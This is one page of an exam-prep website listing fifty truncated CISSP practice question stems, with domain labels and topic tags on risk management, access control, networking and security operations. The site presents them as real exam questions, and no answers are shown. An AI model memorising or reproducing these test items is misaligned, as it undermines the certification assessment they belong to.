Browse Exams Pricing

ExamsCISSPQuestions

CISSP Exam Questions

1,535 real CISSP exam questions with expert-verified answers and explanations. Page 24 of 31.

Question #1151Security and Risk Management
What is considered a compensating control for not having electrical surge protectors installed?
compensating controlsphysical securitypower redundancybusiness continuity
Question #1152Security and Risk Management
What is considered the BEST explanation when determining whether to provide remote network access to a third-party security service?
third-party accessremote accessbusiness justificationrisk management
Question #1153Identity and Access Management (IAM)
When network management is outsourced to third parties, which of the following is the MOST effective method of protecting critical data assets?
third-party riskoutsourcing securityaccess controldata protection
Question #1154Communication and Network Security
What is the FIRST step in reducing the exposure of a network to Internet Control Message Protocol (ICMP) based attacks?
network securityICMP attacksegress filteringnetwork boundary
Question #1155Security Architecture and Engineering
A system developer has a requirement for an application to check for a secure digital signature before the application is accessed on a user's laptop. Which security mechanism addr...
Trusted Platform Module (TPM)secure bootdigital signature verificationendpoint security
Question #1156Security Operations
The security organization is looking for a solution that could help them determine with a strong level of confidence that attackers have breached their network. Which solution is M...
breach detectionhoneypotthreat intelligencesecurity monitoring
Question #1157Security and Risk Management
A security architect is reviewing plans for an application with a Recovery Point Objective (RPO) of 15 minutes. The current design has all of the application infrastructure located...
RPOavailabilitydisaster recoverysingle point of failure
Question #1158Security Operations
Which of the following outsourcing agreement provisions has the HIGHEST priority from a security operations perspective?
outsourcing securityincident responseSLAthird-party management
Question #1159Security and Risk Management
When designing a Cyber-Physical System (CPS), which of the following should be a security practitioner's first consideration?
Cyber-Physical Systemsrisk assessmentsecurity design principles
Question #1160Communication and Network Security
A security professional was tasked with rebuilding a company's wireless infrastructure. Which of the following are the MOST important factors to consider while making a decision on...
wireless securitynetwork designradio signal interference
Question #1161Security Operations
A subscription service which provides power, climate control, raised flooring, and telephone wiring but NOT the computer and peripheral equipment is BEST described as a:
cold sitedisaster recoverybusiness continuity
Question #1162Identity and Access Management
Which of the following is the PRIMARY goal of logical access controls?
logical access controlinformation asset protectionaccess management
Question #1163Software Development Security
The ability to send malicious code, generally in the form of a client side script, to a different end user is categorized as which type of vulnerability?
Cross-Site Scripting (XSS)web vulnerabilitiesclient-side scripting
Question #1164Security Assessment and Testing
The security architect has been mandated to assess the security of various brands of mobile devices. At what phase of the product lifecycle would this be MOST likely to occur?
security assessmentmobile device securitysystem lifecycle
Question #1165Security Operations
A hacker can use a lockout capability to start which of the following attacks?
denial of serviceaccount lockoutattack vectors
Question #1166Asset Security
An Internet media company produces and broadcasts highly popular television shows. The company is suffering a huge revenue loss due to piracy. What technique should be used to trac...
digital watermarkingcontent protectionpiracy prevention
Question #1167Security Architecture and Engineering
Using the cipher text and resultant clear text message to derive the non-alphabetic cipher key is an example of which method of cryptanalytic attack?
cryptanalytic attackknown-plaintext attackcryptography
Question #1168Communication and Network Security
All hosts on the network are sending logs via syslog-ng to the log collector. The log collector is behind its own firewall, The security professional wants to make sure not to put...
firewall filteringstatic packet filteringnetwork security
Question #1169Asset Security
An organization has been collecting a large amount of redundant and unusable data and filling up the storage area network (SAN). Management has requested the identification of a so...
data deduplicationstorage optimizationSAN management
Question #1170Security and Risk Management
A security practitioner has been asked to model best practices for disaster recovery (DR) and business continuity. The practitioner has decided that a formal committee is needed to...
business continuity planningdisaster recoverypolicy development
Question #1171Security and Risk Management
What is the MOST appropriate hierarchy of documents when implementing a security program?
security policystandards and guidelinesdocumentation hierarchy
Question #1172Security Operations
Which of the following is the MOST common cause of system or security failures?
change controlsystem failuresoperational security
Question #1173Identity and Access Management
Which access control method is based on users issuing access requests on system resources, features assigned to those resources, the operational or situational context, and a set o...
Attribute Based Access Control (ABAC)access control modelscontext-aware access
Question #1174Communication and Network Security
Information security practitioners are in the midst of implementing a new firewall. Which of the following failure methods would BEST prioritize security in the event of failure?
fail-closedfirewall securitynetwork resilience
Question #1175Communication and Network Security
Which of the following is a PRIMARY security weakness in the design of Domain Name System (DNS)?
DNS securityprotocol vulnerabilitiessource authentication
Question #1176Security Architecture and Engineering
Which of the following BEST describes the purpose of the reference monitor when defining access control to enforce the security model?
reference monitorsecurity modelsaccess control enforcement
Question #1177Security and Risk Management
A project manager for a large software firm has acquired a government contract that generates large amounts of Controlled Unclassified Information (CUI). The organization's informa...
data ownershipControlled Unclassified Information (CUI)information governance
Question #1178Security and Risk Management
Which of the following protects personally identifiable information (PII) used by financial services organizations?
Gramm-Leach-Bliley Act (GLBA)PII protectionfinancial services compliance
Question #1179Security Assessment and Testing
Which of the following is a common term for log reviews, synthetic transactions, and code reviews?
security control testinglog reviewcode reviewsynthetic transactions
Question #1180Software Development Security
At what stage of the Software Development Life Cycle (SDLC) does software vulnerability remediation MOST likely cost the least to implement?
SDLCvulnerability remediationsecure designcost analysis
Question #1181Security Assessment and Testing
Which of the following BEST describes when an organization should conduct a black box security audit on a new software product?
black box testingsecurity auditsoftware product lifecycle
Question #1182Security and Risk Management
The Chief Information Officer (CIO) has decided that as part of business modernization efforts the organization will move towards a cloud architecture. All business-critical data w...
organizational rolescloud migrationdata protectionCISO
Question #1183Security and Risk Management
When reviewing vendor certifications for handling and processing of company data, which of the following is the BEST Service Organization Controls (SOC) certification for the vendo...
SOC reportsvendor managementcompliancethird-party risk
Question #1184Security Architecture and Engineering
Which of the following is a covert channel type?
covert channelsinformation flowdata leakage
Question #1185Security and Risk Management
Which change management role is responsible for the overall success of the project and supporting the change throughout the organization?
change managementprogram sponsororganizational roles
Question #1186Identity and Access Management
Which of the following is a unique feature of attribute-based access control (ABAC)?
ABACaccess controlattribute-based access
Question #1187Security Assessment and Testing
When auditing the Software Development Life Cycle (SDLC) which of the following is one of the high-level audit phases?
SDLC auditaudit phasesplanning
Question #1188Communication and Network Security
Which of the following BEST describes the purpose of Border Gateway Protocol (BGP)?
BGProuting protocolautonomous systemsnetwork paths
Question #1189Asset Security
Which of the following is the PRIMARY purpose of installing a mantrap within a facility?
physical securitymantrapanti-tailgatingaccess control
Question #1190Security Architecture and Engineering
A security professional can BEST mitigate the risk of using a Commercial Off-The-Shelf (COTS) solution by deploying the application with which of the following controls in ?
COTSsecurity hardeningrisk mitigationsecure configuration
Question #1191Security Operations
Which of the following would an information security professional use to recognize changes to content, particularly unauthorized changes?
file integrity monitoringunauthorized changessecurity tools
Question #1192Security and Risk Management
An organization with divisions in the United States (US) and the United Kingdom (UK) processes data comprised of personal information belonging to subjects living in the European U...
GDPRdata privacydata residencycompliance
Question #1193Security and Risk Management
Which of the following has the responsibility of information technology (IT) governance?
IT governanceorganizational rolesBoard of Directors
Question #1194Security Assessment and Testing
Dumpster diving is a technique used in which stage of penetration testing methodology?
penetration testingdumpster divingreconnaissanceinformation gathering
Question #1195Security Operations
What is the MOST common cause of Remote Desktop Protocol (RDP) compromise?
RDPbrute force attackattack vectorscommon vulnerabilities
Question #1196Asset Security
An organization is looking to include mobile devices in its asset management system for better tracking. In which system tier of the reference architecture would mobile devices be...
asset managementmobile devicesasset classificationsystem tiering
Question #1197Communication and Network Security
Which is MOST important when negotiating an Internet service provider (ISP) service-level agreement (SLA) by an organization that solely provides Voice over Internet Protocol (VoIP...
SLAVoIPQoSnetwork performance
Question #1198Identity and Access Management
A company developed a web application which is sold as a Software as a Service (SaaS) solution to the customer. The application is hosted by a web server running on a specific oper...
least privilegeaccess controlapplication logsSaaS security
Question #1199Security Architecture and Engineering
A systems engineer is designing a wide area network (WAN) environment for a new organization. The WAN will connect sites holding information at various levels of sensitivity, from...
WAN securityRisk alignmentSecurity design principlesInterconnected systems
Question #1200Security and Risk Management
Which event magnitude is defined as deadly, destructive, and disruptive when a hazard interacts with human vulnerability?
Disaster definitionRisk terminologyBusiness continuity

PreviousPage 24 of 31Next

study smarter, certify faster.

Product

Browse Exams
Pricing
PDF Downloads

Resources

Blog
Glossary
Topics
FAQ
Contact Us

Legal

Terms of Service
Privacy Policy
Cookie Policy
DMCA
Refund Policy

Company

About
Contact

© 2026 NerdExam. All rights reserved.Built for IT professionals

NerdExam is a trading name of WADL Solutions Limited, a company incorporated in Hong Kong (CR# 80143234). Registered office: Unit 2904-05, 29/F, Universal Trade Centre, 3 Arbuthnot Road, Central, Hong Kong.

CompTIA, AWS, Cisco, Microsoft, Google Cloud, Oracle, VMware, and other certification names referenced on this site are trademarks of their respective owners. NerdExam is not affiliated with, endorsed by, or sponsored by any certification vendor.